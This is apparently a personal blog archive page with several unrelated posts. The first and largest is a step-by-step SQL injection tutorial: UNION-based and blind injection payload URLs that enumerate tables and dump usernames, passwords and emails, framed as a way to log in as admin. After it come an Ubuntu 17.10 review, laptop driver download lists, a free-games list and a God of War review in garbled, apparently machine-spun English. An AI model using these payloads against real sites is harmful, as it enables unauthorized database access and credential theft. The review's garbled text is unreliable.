Tuesday, May 15, 2018

tutorial sql injection

tutorial sql injection

In this tutorial i will describe how sql injection works and how to
use it to get some useful information.

First of all: What is SQL injection?
It’s one of the most common vulnerability in web applications today.
It allows attacker to execute database query in url and gain access
to some confidential information etc…(in shortly).

1.SQL Injection (classic or error based or whatever you call it)
2.Blind SQL Injection (the harder part)

So let’s start with some action

1). Check for vulnerability
Let’s say that we have some site like this
http://www.site.com/news.php?id=5
Now to test if is vulrnable we add to the end of url ‘ (quote),
and that would be http://www.site.com/news.php?id=5′
so if we get some error like
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”
or something similar
that means is vulrnable to sql injection

2). Find the number of columns
To find number of columns we use statement ORDER BY (tells database how to order the result)
so how to use it? Well just incrementing the number until we get an error.
http://www.site.com/news.php?id=5 order by 1/* <– no error
http://www.site.com/news.php?id=5 order by 2/* <– no error
http://www.site.com/news.php?id=5 order by 3/* <– no error
http://www.site.com/news.php?id=5 order by 4/* <– error (we get message like this Unknown column ‘4′ in ‘order clause’ or something like that)
that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function
With union we can select more data in one sql statement.
so we have
http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )
if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works

4). Check for MySQL version
http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try –
it’s a comment and it’s important for our query to work properly.
let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.
it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*
if you get an error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”
i didn’t see any paper covering this problem, so i must write it
what we need is convert() function
i.e.
http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
or with hex() and unhex()
i.e.
http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
and you will get MySQL version

5). Getting table and column name
well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12…) <— later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.
common table names are: user/s, admin/s, member/s …
common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc…
i.e would be
http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that’s good :D)
we know that table admin exists…
now to check column names.
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)
we get username displayed on screen, example would be admin, or superadmin etc…
now to check if column password exists
http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)
we seen password on the screen in hash or plain-text, it depends of how the database is set up
i.e md5 hash, mysql hash, sha1…
now we must complete query to look nice
for that we can use concat() function (it joins strings)
i.e
http://www.site.com/news.php?id=5 union all select 1,concat(username,0×3a,password),3 from admin/*
Note that i put 0×3a, its hex value for : (so 0×3a is hex value for colon)
(there is another way for that, char(58), ascii value for : )
http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
now we get dislayed username:password on screen, i.e admin:admin or admin:somehash
when you have this, you can login like admin or some superuser
if can’t guess the right table name, you can always try mysql.user (default)
it has user i password columns, so example would be
http://www.site.com/news.php?id=5 union all select 1,concat(user,0×3a,password),3 from mysql.user/*

6). MySQL 5
Like i said before i’m gonna explain how to get table and column names
in MySQL > 5.
For this we need information_schema. It holds all tables and columns in database.
to get tables we use table_name and information_schema.tables.
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*
here we replace the our number 2 with table_name to get the first table from information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
note that i put 0,1 (get 1 result starting from the 0th)
now to view the second table, we change limit 0,1 to limit 1,1
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
the second table is displayed.
for third table we put limit 2,1
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc…
To get the column names the method is the same.
here we use column_name and information_schema.columns
the method is same as above so example would be
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
the first column is diplayed.
the second one (we change limit 0,1 to limit 1,1)
ie.
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
the second column is displayed, so keep incrementing until you get something like
username,user,login, password, pass, passwd etc…
if you wanna display column names for specific table use this query. (where clause)
let’s say that we found table users.
i.e
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name=’users’/*
now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.
Note that this won’t work if the magic quotes is ON.
let’s say that we found colums user, pass and email.
now to complete query to put them all together
for that we use concat() , i decribe it earlier.
i.e
http://www.site.com/news.php?id=5 union all select 1,concat(user,0×3a,pass,0×3a,email) from users/*
what we get here is user:pass:email from table users.
example: admin:hash:whatever@blabla.com
That’s all in this part, now we can proceed on harder part

2. Blind SQL Injection
Blind injection is a little more complicated the classic injection but it can be done
I must mention, there is very good blind sql injection tutorial by xprog, so it’s not bad to read it
Let’s start with advanced stuff.
I will be using our example
http://www.site.com/news.php?id=5
when we execute this, we see some page and articles on that page, pictures etc…
then when we want to test it for blind sql injection attack
http://www.site.com/news.php?id=5 and 1=1 <— this is always true
and the page loads normally, that’s ok.
now the real test
http://www.site.com/news.php?id=5 and 1=2 <— this is false
so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.

1) Get the MySQL version
to get the version in blind attack we use substring
i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5.

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works
when select don’t work then we use subselect
i.e
http://www.site.com/news.php?id=5 and (select 1)=1
if page loads normally then subselects work.
then we gonna see if we have access to mysql.user
i.e
http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.

3). Check table and column names
This is part when guessing is the best friend
i.e.
http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)
then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one
let’s say that we have found that table name is users, now what we need is column name.
the same as table name, we start guessing. Like i said before try the common names for columns.
i.e
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
if the page loads normally we know that column name is password (if we get false then try common names or just guess)
here we merge 1 with the column password, then substring returns the first character (,1,1)

4). Pull data from database
we found table users i columns username password so we gonna pull characters from that.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>80
ok this here pulls the first character from first user in table users.
substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value
and then compare it with simbol greater then > .
so if the ascii char greater then 80, the page loads normally. (TRUE)
we keep trying until we get false.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>95
we get TRUE, keep incrementing
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>98
TRUE again, higher
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>99
FALSE!!!
so the first character in username is char(99). Using the ascii converter we know that char(99) is letter ‘c’.
then let’s check the second character.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),2,1))>99
Note that i’m changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>99
TRUE, the page loads normally, higher.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>107
FALSE, lower number.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>104
TRUE, higher.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>105
FALSE!!!
we know that the second character is char(105) and that is ‘i’. We have ‘ci’ so far
so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).

There are some tools for Blind SQL Injection, i think sqlmap is the best, but i’m doing everything manually,
cause that makes you better SQL INJECTOR
Hope you learned something from this paper.
Have FUN!

ubuntu 17.10 review

ubuntu 17.10 review


The most noticeable change in the new release is dropping Unity for GNOME Shell, and Mir for Wayland. Some people like that, others don’t. But we can’t agree more that it was a wise decision. Just as we suggested 24 hours before Canonical’s announcement regarding the topic.



Default Ubuntu 17.10 Desktop Running GNOME Shell 3.26






Although Unity was an outstanding UI, it was being developed solely by Canonical. Unity 8 (With Mir) was also so far away from becoming mature. Users have been waiting for it since 2013, and they didn’t even manage to get a full-functional and a working release of it. Thus, sticking with Unity for the next two or three LTS releases wouldn’t take Ubuntu anywhere. It was definitely a hard decision for Canonical to drop everything they worked on for 7 years.


As for choosing GNOME Shell instead of KDE or Cinnamon, or anything else to become the default DE, it was also a wise decision. While we personally criticize most of the design decisions coming out from the GNOME team, we can fairly admit that it is one of the most mature desktop environments out there. Combining that with the new stable development cycle and expendable functionalities, GNOME was definitely a good default for most users.


The Ubuntu team tried to keep the Unity experience as much as possible when using GNOME Shell. They have forked the famous “Dash to Dock” extension for GNOME Shell, modified it and re-released it as “Ubuntu Dock“. It’s not installed as an ordinary extension in the normal user configuration files, but rather as a system-wide Debian package.


But there’s a sort of inconsistency when it comes to the app drawer button. For the last 7 years it has always been on the top left side of the launcher, but now, it became on bottom left. Such change is pretty inconvenient for ordinary users. You can of course get it back, but it should have been the default:




Same is true about windows controls. They are now on the right instead of being on the left for the first time in 7 years. There’s no technical difficulty preventing from using these options by default to match the old Unity experience.


LightDM was replaced by GDM. But they could have used a wallpaper instead of that solid purple color, no? Sadly there’s no way to modify it from control center:


GDM on Ubuntu 17.10 (image via didrocks.fr)




Now, let’s drive more technical.


Resources consumption on GNOME Xorg & GNOME Wayland session is the same: Around 1.4GB of RAM. CPU depends on what you are running.


As for the Wayland session on Ubuntu, it does suffer from many problems like non-working administrative applications (Synaptic & GParted), non-free video drivers not working and some other stability problems. But these issues are not Ubuntu-specific; These issues are related more about the architecture of Wayland protocol, not the hosting distribution. Same issues do exist on all other distributions running GNOME Wayland. It’s better to keep using the GNOME Xorg session at the moment.


GNOME Shell 3.26 on Ubuntu comes with the following Ubuntu-specific patches. Many of them were upstreamed (sent to GNOME team to include it for all distributions). Here are some important ones: 
Patch to prevent Shell from becoming unresponsive with Empathy. 
Patch to allow sound adjustment of above 100% from the control center. 
Patch to implement a smarter Alt + Tab behavior. 
Patch to fix VirtualBox crashing under Wayland. 
Patch to add an option to enable/disable GNOME Shell hot corner in Gsettings (You can see it via installing dconf-editor, and then navigating to org –> gnome –> shell –> enable hot corners). 
Patch to enable user switching if LightDM was used with GNOME Shell instead of GDM. 
Patch to set the default login screen background into the default Ubuntu color. 


If you would like to get a vanilla GNOME experience, you can install the gnome-session package from the software center or via the package manager, and then you’ll see a “GNOME Session” option in the login window. As for GTK+ 3.22, there’s also a number of Ubuntu-specific patches. Most of them are Wayland-related or old Unity patches.


Ubuntu 17.10 comes with the newest set of software available: Linux 4.13, Firefox 56.0, Libreoffice 5.4, Python 3.6 and a lot more. Just like any other non-LTS Ubuntu release.


Apport, the Ubuntu bug reporting software, no longer pops up every few minutes to report about an normally operating application. For the first time of my personal usage for Ubuntu in around 8 years, I can finally stop recommending removing Apport.


Snaps are integrated into the Ubuntu Software Center (Same as GNOME Software with Ubuntu branding). Meaning that you can search for Snaps or install them directly from there a. But some highlighting is required in order to determine trusted snaps & ordinary packages from unknown snaps:

Snaps in Ubuntu Software under Ubuntu 17.10




Currently, there are around 58000 packages available in the official Ubuntu repositories.


We didn’t face any bugs or blocking problems while using the new release. Everything is just working as in anywhere else. This, of course, can be different in your situation according to your usage scenario.
Conclusion



The new Ubuntu release is more stable and upstream than ever. While it brings many controversial software & design related decisions, it remains a usable Linux distribution which can be depended on in order to do daily work. It’s also free of a lot of bugs that existed in the previous releases.

Wednesday, April 25, 2018

driver asus ROG GL552VXk

driver asus ROG GL552VXk


VGA
Version V22.21.13.82532017/07/06573.74 MBytes

nVidia Graphics Driver
DOWNLOAD
BIOS
Version 3002017/06/224.26 MBytes

BIOS 300
Optimize system performance
DOWNLOAD
AUDIO
Version V8.66.52.522016/12/30106.03 MBytes

Conexant Audio Driver
DOWNLOAD
LAN
Version V10.10.714.20162016/10/1210.1 MBytes

Realtek LAN Driver
DOWNLOAD
Card Reader
Version V10.0.14393.212922017/01/0616.23 MBytes

Realtek Multi-Card Reader Driver
DOWNLOAD
TouchPad
Version V11.0.132016/10/242.65 MBytes

ASUS Precision Touchpad
DOWNLOAD
Others
Version V15.2.5.10352017/01/0613.47 MBytes

Intel Rapid Storage Technology
DOWNLOAD
Utilities
Version 2.4.132018/01/1042.37 MBytes

Sonic Suite V2.4.13
DOWNLOAD
Wireless
Version V2023.56.502.20172017/07/1932.38 MBytes

Realtek Wireless Lan Driver and Application
DOWNLOAD
BIOS-Utilities
Version V3.2.22016/09/021.34 MBytes

WinFlash
Windows BIOS Flash Utility
DOWNLOAD
Chipset
Version V10.1.1.382016/11/162.59 MBytes

Intel INF Update Driver
DOWNLOAD
ATK
Version V1.0.00502016/10/1711.27 MBytes

ATKPackage
ATKACPI driver and hotkey-related utilities
Fix Unquoted Service Path issue.
Thanks for Yunus YILDIRIM (@Th3GundY), CT-Zer0 Team (@CRYPTTECH)
DOWNLOAD
BlueTooth
Version V1.4.887.1705182017/07/0320.73 MBytes

Realtek BlueTooth driver
DOWNLOAD
EMI and Safety
Version V1.02015/09/2346.71 KBytes

CE Declaration of Conformity
DOWNLOAD

driver asus ROG GL552VX

driver asus ROG GL552VX

Image result for ROG GL552VX

VGA
Version V20.19.15.44542016/06/13203.01 MBytes

Intel Graphics Driver
BIOS
Version 3002017/06/222.6 MBytes

BIOS 300
Optimize system performance
AUDIO
Version V8.66.30.602016/06/2099.35 MBytes

Conexant Audio Driver
LAN
Version V10.9.422.20162016/07/0410.09 MBytes

Realtek LAN Driver
Card Reader
Version V10.0.10143.212782015/08/1312.66 MBytes

Realtek Multi-Card Reader Driver
TouchPad
Version V4.0.122015/11/1353.75 MBytes

ASUS Smart Gesture (Touchpad Driver) [Please update ATK Package V1.0.0020 or later in advance]
Others
Version V1.0.0.02016/12/1293.94 MBytes

ASUS ME Update Tool
Utilities
Version V3.19.00042016/11/2514.68 MBytes

ASUS Splendid Video Enhancement Technology
Enhances your ASUS notebook PC screen, reproducing richer and deeper colors for visually stunning experience.
Wireless
Version V19.0.1.12016/08/18158.33 MBytes

Intel Wireless Lan Driver and Application
Version V3.0.12015/08/14888.63 KBytes

Windows BIOS Flash Utility
Chipset
Version V10.1.1.112015/09/112.68 MBytes

Intel INF Update Driver
ATK
Version V1.0.00502016/10/1711.27 MBytes

ATKPackage
ATKACPI driver and hotkey-related utilities
Fix Unquoted Service Path issue.
Thanks for Yunus YILDIRIM (@Th3GundY), CT-Zer0 Team (@CRYPTTECH)
BlueTooth
Version V18.1.1539.23492015/12/117.07 MBytes

Intel BlueTooth driver
Version V1.02017/06/14169.58 KBytes

CE Declaration of Conformity
Version V1.02017/06/14171.7 KBytes

CE Declaration of Conformity
Version V1.02017/06/14232.36 KBytes

CE Declaration of Conformity
Version V1.02017/06/14171.98 KBytes

CE Declaration of Conformity
Version V1.02017/06/14243.43 KBytes

CE Declaration of Conformity
Version V1.02017/06/14231.86 KBytes

CE Declaration of Conformity
Version V1.02017/06/1498.85 KBytes

CE Declaration of Conformity
Version V1.02017/06/1498.23 KBytes

CE Declaration of Conformity
Version V1.02017/06/14100.41 KBytes

CE Declaration of Conformity
Version V1.02017/06/14160.2 KBytes

CE Declaration of Conformity
Version V1.02017/06/14100.6 KBytes

CE Declaration of Conformity
Version V1.02017/06/14157.66 KBytes

CE Declaration of Conformity
Version V1.02017/06/14160.02 KBytes

CE Declaration of Conformity
Version V1.02017/06/13170.65 KBytes

CE Declaration of Conformity
Version V1.02015/09/23960.77 KBytes

KCC Certification
Version V1.02015/09/23484.36 KBytes

BSMI Certification
Version V1.02015/09/2346.71 KBytes

CE Declaration of Conformity
Version V1.02015/09/2387.02 KBytes

FCC Declaration of Conformity
Version V1.02015/03/18178.54 KBytes

CB Certification
Version V1.02015/03/181.4 MBytes

CCC Certification

driver msi gl62m 7rex

driver msi gl62m 7rex







Audio
Title
Audio Driver
Version
6.0.1.8199
Release Date
2017-12-15
File Size
284.86 MB
VGA
Title
Intel Graphics Driver
Version
22.20.16.4836
Release Date
2017-12-08
File Size
283.68 MB
Title
NVIDIA Graphics Driver
Version
382.05
Release Date
2017-06-19
File Size
562.99 MB
Bluetooth
Title
Intel Bluetooth Driver
Version
19.60.0.3
Release Date
2017-07-04
File Size
83.59 MB
Wireless LAN
Title
Intel Wireless LAN Driver
Version
19.51.0.4
Release Date
2017-07-04
File Size
324.44 MB
Card Reader
Title
Realtek Card Reader Driver
Version
10.0.15063.31236
Release Date
2017-07-04
File Size
15.93 MB
Intel Rapid Storage Technology
Title
Intel Rapid Storage Technology Driver
Version
15.7.0.1014
Release Date
2017-07-04
File Size
15.16 MB
Title
Intel Rapid Storage Technology F6 Driver
Version
15.2.0.1020
Release Date
2017-01-06
File Size
0.44 MB
Description
FAQ
Note
To recognize the RAID volume during the system installation, please load the Intel Rapid Storage Technology driver.
TouchPad
Title
Synaptics TouchPad Driver
Version
19.3.4.184
Release Date
2017-07-03
File Size
29.21 MB
Intel Management Engine
Title
Intel Management Engine Driver
Version
11.7.0.1014
Release Date
2017-06-15
File Size
76.96 MB
Chipset
Title
Intel Chipset Driver
Version
10.1.1.44
Release Date
2017-06-15
File Size
3.08 MB
Radio Switch
Title
ENE Radio Switch for Airplane Mode
Version
1.1.4.0
Release Date
2017-06-15
File Size
0.85 MB
LAN
Title
Qualcomm LAN Driver
Version
2.1.0.26(pacakge 1.0.0.34)
Release Date
2017-01-10
File Size
59.22 MB


Tuesday, April 24, 2018

top free game 2018

top free game 2018








1. Fortnite Battle Royale


The Battle Royale trend is huge right now, and Epic Games has all but perfected it with Fortnite Battle Royale. Initially developed as a sort of add-on for Fortnite, Battle Royale took of in a way that nobody was anticipating, quickly becoming one of the most played games in the world in 2018.


The game is entirely based around a simple scenario: you’re dumped in a map with 99 other players in a free-for-all melee, and the only winner is the one who is left standing at the end. And, no matter how many similarities it may draw to games like PlayerUnknown’s Battlegrounds, Fortnite Battle Royale carves its own identity with its colorful art style, personality and accessible gameplay.


Sure, there are microtransactions, but they’re all cosmetic and have no bearing on gameplay. But, what’s more important – you’ll never run out of people to play with, as cross-play between Xbox One and, soon, iOS users will match you up against millions of different people.












2. Planetside 2


Two years before Destiny dropped into orbit, we had Planetside 2. It’s an epic, all-out first-person battle so unbelievable, you’ll have to pinch yourself every time you load it up to remind yourself it’s completely free. There are in-game purchases, sure, but you can still dive into the biggest battlefield in gaming and be useful with the default equipment.


There's simply nothing like taking part in a massed assault on an enemy base and coming out on top, or living in a world where an enemy convoy could appear on the horizon at any second. If you need any proof that 'free' doesn't mean uninspired, Planetside 2 will provide it.








3. War Thunder


Think World of Tanks is a bit too arcade-like for your tastes? You need to try out the free game War Thunder. Despite being lesser-known, it's a great alternative to that tank battler. And for an extra sweetener, it throws airplanes into the mix too. As you might expect, they're a great deal of fun.


With a fast enough PC, War Thunder offers visual quality you don't see too often in free-to-play games. You will need to pay some cash to get hold of the more interesting planes and tanks early on, but getting Battlefield-like play for free sounds like a good deal to us.


There are arcade and historical battles on offer – the former is great for a more casual blast while historical battles are more for players with a few hours on their flight card.











4. Eve Online


In 2003, Icelandic developer CCP Games unleashed unto the world Eve Online, an immersive and in-depth “sci-fi experience” that would eventually garner the attention of well over 500,000 players. Eve Online is unlike any game in its category, thanks to the vast range of activities to take part in as well as its (appropriately) out of this world in-game economy.


Unfortunately, the Eve Online player base has been on the decline since 2013. It should come as no shock that as time goes on, fewer and fewer gamers are interested in paying a subscription fee for a glorified space sim with a steep learning curve. As of the Ascension update, which released in November 2016, Eve Online has gone free-to-play – at least to an extent.


The new ‘alpha clones’ system featured in Eve Online is similar to the “unlimited free trial” featured in World of Warcraft. You can still engage with other players in mining, piracy, manufacturing, trading, exploring and combat, but certain skills will be off-limits. As long as you don’t mind finite access to some of the game’s most lumbering ships, Eve Online won’t cost a cent.











5. Blacklight: Retribution


Blacklight: Retribution may not be as free as it was before it arrived on PS4, but it's still a damn fun and affordable way to play an FPS. Almost like a free-to-play Titanfall, Blacklight: Retribution has no single-player mode to offer and takes place in a futuristic Cyberpunk setting complete with fan-favorite modes like Deathmatch, Team Deathmatch, Capture the Flag, Domination, King of the Hill and Kill Confirmed.


Featuring customizable weapons and mechs, of course, Blacklight: Retribution is a fun, free and safe way to let off steam after that 9 to 5. Plus, with over 1 million registered players and counting, there's bound to me no shortage of teammates (and rivals) to join up with.









6. Hawken


As it's been in beta since 2012 with little to no marketing push, you may have forgotten about Hawken or were unfamiliar with it in the first place. Most notably, Hawken is a game about mechs. But, not just any mechs – fast mechs. These are your average slow, lumbering tanks of MechWarrior Online. These are more comparable to the Exoskeletons of Call of Duty: Advanced Warfare.


Of course, being a free-to-play game, you can expect to pay for upgrades to your starter mech. However, you can still get a taste for Hawken without spending a dime. Plus, attach an Oculus Rift and you can see for yourself what VR gameshave in store for you. Admit it, you've wanted to know what it's feels like to power a mech for yourself since Pacific Rim came out.











7. Team Fortress 2


It may be an old vet in gaming terms, but nothing offers so much crazy fun as Team Fortress 2. Unlike most shooters of its age, players are still there to have a good time rather than hurl abuse at newcomers, and there's no shortage of cool toys to have fun with. Endlessly silly and amazingly fresh, it's still one of the shooter genre's kings, free-to-play or not.


As you might guess, there are some micro-transactions involved. You can buy additional items, often used to customise your character. You can create your own. It's fun, and gets you even more involved in TF2. Those cheeky devils at Valve know what they're doing.











8. Gigantic


Though it may have gotten lost in the fog of Overwatch, Lawbreakers and the like, Gigantic is yet another hero shooter in a jumbled sea of hero shooter fanaticism. The difference is that Gigantic, much like the unfortunately fated Battleborn, is a lot more MOBA-esque than Blizzard and Boss Key Studios’ similarly styled games.


The gameplay largely revolves around two teams of five players who are both trying to defeat both each other and a mystical leviathan known as a guardian. Likewise, Gigantic gives players the choice between a wide variety of characters each with their own abilities and upgrades. Plus, it’s on Xbox One, too, in case you want to continue the fun in the living room.













9. Paladins


It’s not hard to see why Paladins catches a lot of flack for its resemblance to Overwatch. At the same time, the team-based shooter bears many distinctions from that of Blizzard’s. Abilities are upgraded based on a collectible card system, which can completely change the way each character plays.


What’s more, unlike Overwatch, Paladins is completely free-to-play. While cosmetic items are available to buy using real-world currency, everything else can be unlocked simply by playing the game. For instance, you’ll start Paladins with a single deck of basic cards, and from there, more dramatically impactful decks can be unlocked.


Regardless of how you choose to play Paladins, you’ll get XP as you play. As long as you’re completing the daily quests and achievements featured in the game, you’ll be rewarded with Radiant Chests and Gold. These can be used to purchase more cards, costumes and weapon skins to make your characters more unique and skillful on the battlefield.















10. Pro Evolution Soccer 2018 Lite


You may be familiar with Fifa already, but Pro Evolution Soccer – or PES – is one of the best-selling video game franchises of all-time. It doesn’t have all the flair (or the licensing) of its EA Sports rival, but some would argue that it’s the better soccer game series, not to mention one of the better sports series overall.


PES 2018 in particular isn’t too much of an improvement over its predecessor, but it does introduce better dribbling and makes an effort to perfect the fan-favorite Master League mode. The ‘Lite’ version of Pro Evolution Soccer 2018 gives you access to the Online myClub and PES League Mode in addition to the Offline Exhibition Match and Training Mode, entirely for free. There are in-app purchases along the way, but you can always upgrade to the full version later should this one not satisfy.






YOU CAN DOWNLOAD ALL OFF THESE GAME ON STEAM


AT LEAST NOT LAST THIS IS BEST GAME IN MY VERSION

Friday, April 20, 2018

god of war review

god of war review

            A portion of the best movies ever are those whose distinctive qualities all work in show to make a bound together, immersing entirety. The Shining, The Social Network, and Jaws are altogether incredible cases of movies made up of solid individual parts supplementing each other to frame an awesome gem. That is completely valid for God of War – its melodic score hoists story minutes, which stream consistently into fabulous activity gameplay, which encourages investigation and riddles that reward you with a more profound comprehension of its characters and its far reaching and lovely world. Divine force of War is a wonderful piece of uncommon interlocking parts, think in its plan and its anticipating, which pays off in startling courses in both the gameplay and story.

Set in another, Norse folklore enlivened world and featuring a recognizable however mindfully reconsidered character, Divine force of War's fish-out-of-Greek-water story is a constant tornado of feelings. It's altogether encircled by one ceaseless camera shot that never removes or takes the concentration off of its core all: Kratos' association with his young child, Atreus. Be that as it may, the story likewise envelops a permanent supporting cast, a dazzling world reliably remunerating to investigate, and enormously fulfilling battle.


God of War works from minute one thanks to the simplicity of its plot.
God of War works from minute one thanks to the simplicity of its plot. Kratos and Atreus – who start as, at best, acquaintances – begin their journey having just gone through the loss of Kratos’ wife, whom Atreus bonded with much more than his father. The two set out to the tallest point in all the realms to carry out her final wishes.
The setup is Journey-like in its visual nature – I saw the peak in the distance and knew I’d get there eventually – but as similar stories have taught me, the path is never a straight or easy one. A number of obstacles, both natural and god-made, extend the adventure to around 25 hours’ worth of terrifying threats, beginning with the first major encounter in the opening hours.